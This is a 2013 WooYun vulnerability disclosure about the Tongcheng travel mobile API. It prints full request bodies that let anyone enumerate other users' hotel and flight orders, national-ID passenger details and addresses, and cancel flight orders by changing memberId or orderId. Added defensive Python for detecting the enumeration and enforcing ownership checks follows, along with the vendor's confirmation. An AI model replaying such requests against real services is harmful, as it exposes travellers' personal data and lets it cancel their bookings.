
Vulnerability summary

Defect ID: wooyun-2013-017921

Title: 【同程网 (Tongcheng)】Unauthorized viewing of any user's hotel / flight orders, passenger details and saved addresses

Vendor: 苏州同程旅游网络科技有限公司 (Suzhou Tongcheng Travel Network Technology Co., Ltd.)

Author: O.o

Submitted: 2013-01-26 14:51

Fix time: 2013-03-12 14:51

Published: 2013-03-12 14:51

Type: sensitive information disclosure

Severity: high

Self-assessed rank: 16

Status: confirmed by vendor

Source: http://www.wooyun.org



Vulnerability details

Disclosure status:

2013-01-26: details sent to the vendor, awaiting vendor handling
2013-01-27: vendor confirmed; details visible to the vendor only
2013-02-06: details opened to core white hats and domain experts
2013-02-16: details opened to regular white hats
2013-02-26: details opened to intern white hats
2013-03-12: details opened to the public

Summary:

Spotted this in passing and am throwing it out here. Also, when I was paying for the 399 ticket I had just booked it kept telling me the price had changed to 869, but when I went back and checked it still showed 399. Nice one~

Details:


Hotel orders:
1. Any user's order list
http://mobileapi.17usoft.com/tcmiddleapi/hotel/orderhandler.ashx
Parameters
{"request":{"body":{"pageSize":"50","memberId":"17145645","clientInfo":{"deviceId":"486874946330901","versionNumber":"4.6.0","versionType":"android"},"page":"1","timeSpanType":"1"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","deviceId":"486874946330901","digitalSign":"55f1275b7020365b979a0538875a6c91","refId":"5866720","reqTime":"2013-01-25 22:44:52.854","serviceName":"GetOrderList","version":"20111128102912"}}}
Changing the user ID variable ("memberId":"17025644")
returns that user's orders, including the order number field ("orderSerialId":"130125009132").
[Image: hotel order numbers under the chosen member ID]


2. Any order's details
http://mobileapi.17usoft.com/tcmiddleapi/hotel/orderhandler.ashx
POST parameters
{"request":{"body":{"clientInfo":{"deviceId":"486874946330901","versionNumber":"4.6.0","versionType":"android"},"orderSerialId":"130125005000"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","deviceId":"486874946330901","digitalSign":"5052db223223a1b9caa0cb30ead4450c","refId":"5866720","reqTime":"2013-01-25 22:44:54.484","serviceName":"GetOrderDetail","version":"20111128102912"}}}
Changing the order number variable
("orderSerialId":"130125005000")
returns the details of that order.
[Image: hotel order details]


Flight orders
1. Any user's order list
http://tcmobileapi.17usoft.com/MobileAPI/flight/orderhandler.ashx
{"request":{"body":{"clientInfo":{"deviceId":"486874946330901","versionNumber":"4.6.0","versionType":"android"},"memberId":"17145335"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","deviceId":"486874946330901","digitalSign":"40c276658239c7a6012292cdc46b79fb","refId":"5866720","reqTime":"2013-01-25 23:16:45.164","serviceName":"GetFlightOrderList","version":"20111128102912"}}}
Changing the user ID variable ("memberId":"17145335")
returns that user's order list and the order numbers under the account ("orderNo":"43828198").
[Image: flight order numbers under the chosen member ID]


2. Any order's details, queried together with the memberId
http://tcmobileapi.17usoft.com/MobileAPI/flight/orderhandler.ashx
{"request":{"body":{"clientInfo":{"deviceId":"486874946330901","versionNumber":"4.6.0","versionType":"android"},"memberId":"17145335","orderId":"43828198"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","deviceId":"486874946330901","digitalSign":"47d608c04c39bcf8ae098eca0c51131a","refId":"5866720","reqTime":"2013-01-25 23:16:36.384","serviceName":"GetFlightOrderdetail","version":"20111128102912"}}}
Here "memberId":"17145622","orderId":"43827455" must be taken from step 1 (any user's order list) and must belong together; otherwise the response shows "undefined".
[Image: flight order details 1]

[Image: flight order details 2]


3. Frequent traveller (passenger) information, including national ID numbers
http://tcmobileapi.17usoft.com/MobileAPI/general/contactHandler.ashx
{"request":{"body":{"clientInfo":{"deviceId":"486874946330901","versionNumber":"4.6.0","versionType":"android"},"memberId":"17145542"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","deviceId":"486874946330901","digitalSign":"1efefd983244229fa185ffd07eb03fbf","refId":"5866720","reqTime":"2013-01-25 23:07:01.444","serviceName":"GetContactList","version":"20111128102912"}}}
[Image: passenger information]


4. Flight order cancellation
http://tcmobileapi.17usoft.com/MobileAPI/flight/orderhandler.ashx
{"request":{"body":{"memberId":"17145645","memberName":"181ytghw888","clientInfo":{"deviceId":"486874946330901","versionNumber":"4.6.0","versionType":"android"},"cancelReason":"4","orderId":"43830981"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","deviceId":"486874946330901","digitalSign":"2384b1bf7507eed18f2259fe0155a6c1","refId":"5866720","reqTime":"2013-01-25 23:27:25.634","serviceName":"CancelFlightOrder","version":"20111128102912"}}}
Here "memberId":"17145622","orderId":"43827455" must be taken from step 1 (any user's order list) and must belong together.
I didn't take a screenshot the first time I cancelled, and I can't go around cancelling other people's tickets, so I'm adding one where a credit-card order is refused cancellation as verification.
A successful cancellation returns
{"response":{"header":{"rspType":"0","rspCode":"0000","rspDesc":"取消订单成功"},"body":""}}
[Image: flight order cancellation]


Saved address lookup
http://tcmobileapi.17usoft.com/MobileAPI/General/ReciverHandler.ashx
{"request":{"body":{"clientInfo":{"deviceId":"486874946330901","versionNumber":"4.6.0","versionType":"android"},"memberId":"17145645"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","deviceId":"486874946330901","digitalSign":"e4c06c6a3573a4d935ee58f9295eaa2a","refId":"5866720","reqTime":"2013-01-25 23:36:13.874","serviceName":"QueryReciver","version":"20111128102912"}}}
[Image: saved address lookup]
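Every request above carries the caller's own session (accountID, deviceId) in the header while the target memberId sits in the body, and a legitimate client only ever sends its own memberId. That makes the enumeration easy to spot from the server side. The following is an added example, not part of the report and not Tongcheng's tooling: it assumes the API gateway logs one request envelope per line in the shape shown above (the log lines, the second accountID and the session table are constructed for the example) and applies two rules, one that needs no session data (one accountID asking for several distinct memberIds) and one that compares the body memberId with the member the session really belongs to.

```python
import json
from collections import defaultdict

# Services whose request body carries a memberId, named as in the report's requests.
MEMBER_SCOPED = {"GetOrderList", "GetFlightOrderList", "GetContactList", "QueryReciver"}

# Constructed sample log (assumption: one request envelope per line, in the
# shape the report shows). Lines 1-4 replay the report's pattern, one
# accountID/deviceId walking through several memberIds. Lines 5-6 are a normal
# client that only ever sends its own memberId.
SAMPLE_LOG = """
{"request":{"body":{"memberId":"17145645","pageSize":"50"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","deviceId":"486874946330901","reqTime":"2013-01-25 22:44:52.854","serviceName":"GetOrderList"}}}
{"request":{"body":{"memberId":"17025644","pageSize":"50"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","deviceId":"486874946330901","reqTime":"2013-01-25 22:45:10.120","serviceName":"GetOrderList"}}}
{"request":{"body":{"memberId":"17145335"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","deviceId":"486874946330901","reqTime":"2013-01-25 23:16:45.164","serviceName":"GetFlightOrderList"}}}
{"request":{"body":{"memberId":"17145542"},"header":{"accountID":"c26b007f-c89e-431a-b8cc-493becbdd8a2","deviceId":"486874946330901","reqTime":"2013-01-25 23:07:01.444","serviceName":"GetContactList"}}}
{"request":{"body":{"memberId":"20000001"},"header":{"accountID":"0f0f0f0f-0000-4000-8000-000000000001","deviceId":"111111111111111","reqTime":"2013-01-25 23:30:00.000","serviceName":"GetOrderList"}}}
{"request":{"body":{"memberId":"20000001"},"header":{"accountID":"0f0f0f0f-0000-4000-8000-000000000001","deviceId":"111111111111111","reqTime":"2013-01-25 23:31:00.000","serviceName":"QueryReciver"}}}
"""


def parse_log(text):
    """Keep only member-scoped requests, flattened to the fields the rules need."""
    records = []
    for line in text.strip().splitlines():
        req = json.loads(line)["request"]
        header, body = req["header"], req["body"]
        if header.get("serviceName") in MEMBER_SCOPED and "memberId" in body:
            records.append({
                "account": header["accountID"],
                "device": header.get("deviceId"),
                "time": header.get("reqTime"),
                "service": header["serviceName"],
                "memberId": body["memberId"],
            })
    return records


def find_enumerators(records, max_members=1):
    """Rule 1 (needs no session data): a real client only sends its own
    memberId, so an accountID seen with more than max_members distinct
    memberIds is enumerating. Returns {accountID: sorted memberIds}."""
    seen = defaultdict(set)
    for r in records:
        seen[r["account"]].add(r["memberId"])
    return {acct: sorted(ids) for acct, ids in seen.items() if len(ids) > max_members}


def foreign_requests(records, sessions):
    """Rule 2 (needs the session store): every request whose body memberId is
    not the member that accountID belongs to. `sessions` maps accountID to
    memberId and is an assumption about the backend."""
    return [r for r in records
            if r["account"] in sessions and r["memberId"] != sessions[r["account"]]]


def report(records, sessions):
    """One human-readable line per finding."""
    lines = []
    for acct, ids in find_enumerators(records).items():
        lines.append(f"ENUMERATION accountID={acct} distinct memberIds={len(ids)}: {', '.join(ids)}")
    for r in foreign_requests(records, sessions):
        lines.append(f"FOREIGN {r['time']} accountID={r['account']} {r['service']} memberId={r['memberId']}")
    return lines


if __name__ == "__main__":
    # Constructed session table matching the sample log.
    sessions = {"c26b007f-c89e-431a-b8cc-493becbdd8a2": "17145645",
                "0f0f0f0f-0000-4000-8000-000000000001": "20000001"}
    for line in report(parse_log(SAMPLE_LOG), sessions):
        print(line)
```

Rule 1 is the one to run first: it needs nothing but the request log, and in this API a threshold of one distinct memberId per session is already exact, because no legitimate flow ever queries a different member.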

Proof of vulnerability:

Remediation:

Add authorization checks to the interfaces. There are other interfaces as well (hotel order cancellation and so on) that I won't list one by one. At the moment, as long as the user ID and order ID match, every order can be operated on.
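What "authorization checks on the interfaces" means in practice, as an added example rather than the site's own handler code (the .ashx handlers are ASP.NET and are not on this page): the member identity must come from the server-side session behind accountID, never from the memberId in the body, and every order-scoped call (detail, cancel) must check that the resolved member owns the order. The envelope shape and the serviceName values are taken from the report; the session table, the order store, the handler names and the CancelOrder service name are assumptions. digitalSign is left out because the report does not say how it is computed and it does not change the decision: a request signature proves the app built the request, not that the caller owns the memberId it names.

```python
import json

# Constructed stores (assumption, not the site's data model). The accountID is
# the session value from the report's requests; which member it belongs to, and
# which member owns which order, are invented for the example.
SESSIONS = {
    "c26b007f-c89e-431a-b8cc-493becbdd8a2": "17145645",
}
ORDERS = {
    "130125009132": {"memberId": "17025644", "hotel": "Hotel A", "status": "paid"},
    "130125005000": {"memberId": "17145645", "hotel": "Hotel B", "status": "paid"},
}


class Forbidden(Exception):
    """The caller may not see or act on the requested object."""


def parse_envelope(raw):
    """Split the {"request":{"header":...,"body":...}} envelope shown in the report."""
    req = json.loads(raw)["request"]
    return req["header"], req["body"]


def vulnerable_get_order_detail(raw):
    """The behaviour the report describes: whatever orderSerialId the body
    names is returned, with no check that the caller owns it."""
    _header, body = parse_envelope(raw)
    return ORDERS[body["orderSerialId"]]


def caller_member(header):
    """Resolve the caller from the server-side session keyed by accountID.
    The memberId in the body is attacker-controlled and is never consulted."""
    member = SESSIONS.get(header.get("accountID"))
    if member is None:
        raise Forbidden("no valid session")
    return member


def owned_order(header, body):
    """Load an order only if the session's member owns it."""
    member = caller_member(header)
    order = ORDERS.get(body.get("orderSerialId"))
    if order is None or order["memberId"] != member:
        # Same error for "does not exist" and "not yours": a distinguishable
        # answer would let the endpoint confirm which order numbers are live.
        raise Forbidden("order not found")
    return order


def get_order_list(raw):
    header, _body = parse_envelope(raw)
    member = caller_member(header)  # body["memberId"] is ignored on purpose
    return sorted(oid for oid, o in ORDERS.items() if o["memberId"] == member)


def get_order_detail(raw):
    header, body = parse_envelope(raw)
    return owned_order(header, body)


def cancel_order(raw):
    header, body = parse_envelope(raw)
    order = owned_order(header, body)
    order["status"] = "cancelled"
    return {"response": {"header": {"rspType": "0", "rspCode": "0000",
                                    "rspDesc": "order cancelled"}, "body": ""}}


# GetOrderList/GetOrderDetail are serviceName values from the report's headers;
# CancelOrder is an assumed name (the report shows CancelFlightOrder on the
# flight handler).
HANDLERS = {
    "GetOrderList": get_order_list,
    "GetOrderDetail": get_order_detail,
    "CancelOrder": cancel_order,
}


def dispatch(raw):
    """Route on header.serviceName the way the single .ashx endpoint does."""
    header, _body = parse_envelope(raw)
    handler = HANDLERS.get(header.get("serviceName"))
    if handler is None:
        raise Forbidden("unknown service")
    return handler(raw)


def make_request(service, account_id, **body):
    """Build an envelope in the report's shape (digitalSign, reqTime and
    clientInfo left out; they do not affect the authorization decision)."""
    return json.dumps({"request": {"header": {"accountID": account_id,
                                              "serviceName": service},
                                   "body": body}})


if __name__ == "__main__":
    me = "c26b007f-c89e-431a-b8cc-493becbdd8a2"
    foreign = make_request("GetOrderDetail", me, orderSerialId="130125009132")
    print("vulnerable:", vulnerable_get_order_detail(foreign))
    try:
        dispatch(foreign)
    except Forbidden as err:
        print("fixed:", err)
    print("own list:", dispatch(make_request("GetOrderList", me, memberId="17025644")))
```

The same pattern covers the flight handler, the contact list and the address lookup: drop memberId from the request contract entirely, or at most reject any request whose body memberId differs from the session's member, and apply the ownership test to every order-scoped action, cancellation included.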

Copyright notice: please credit O.o@乌云 when reposting


Vendor response

Vendor response:

Severity: high

Vulnerability rank: 19

Confirmed: 2013-01-27 20:00

Vendor reply:

Very serious, many thanks, we will investigate and fix it as soon as possible

Latest status:

None yet


Vulnerability ratings:

Comments

  1. 2013-01-26 14:55 | O.o ( regular white hat | Rank:105 vulnerabilities:12 | ส็็็็็็็็็็็็็็็็็็็...)

    -Airport girl: Hello sir, your ticket doesn't exist~ you can't get a boarding pass~ -XSSER: No way, I definitely booked it on 同程网~ -Airport girl: Sir, your order has already been cancelled~ -XSSER: Oh for crying out loud!

  2. 2013-01-26 15:31 | xsser certified white hat ( regular white hat | Rank:254 vulnerabilities:18 | When I look back at everything again, will this world be all right?)

    This has been reported many times already

  3. 2013-01-26 16:09 | O.o ( regular white hat | Rank:105 vulnerabilities:12 | ส็็็็็็็็็็็็็็็็็็็...)

    @xsser If it's the same interface, please delete it~ thanks~

  4. 2013-01-28 09:23 | 顺子 ( regular white hat | Rank:236 vulnerabilities:36 | 0-0 trying to get closer to being a normal youth, never again the one who uploads the wrong screenshot 2...)

    -Airport girl: Hello sir, your ticket doesn't exist~ you can't get a boarding pass~ -XSSER: No way, I definitely booked it on 同程网~ -Airport girl: Sir, your order has already been cancelled~ -XSSER: Oh for crying out loud!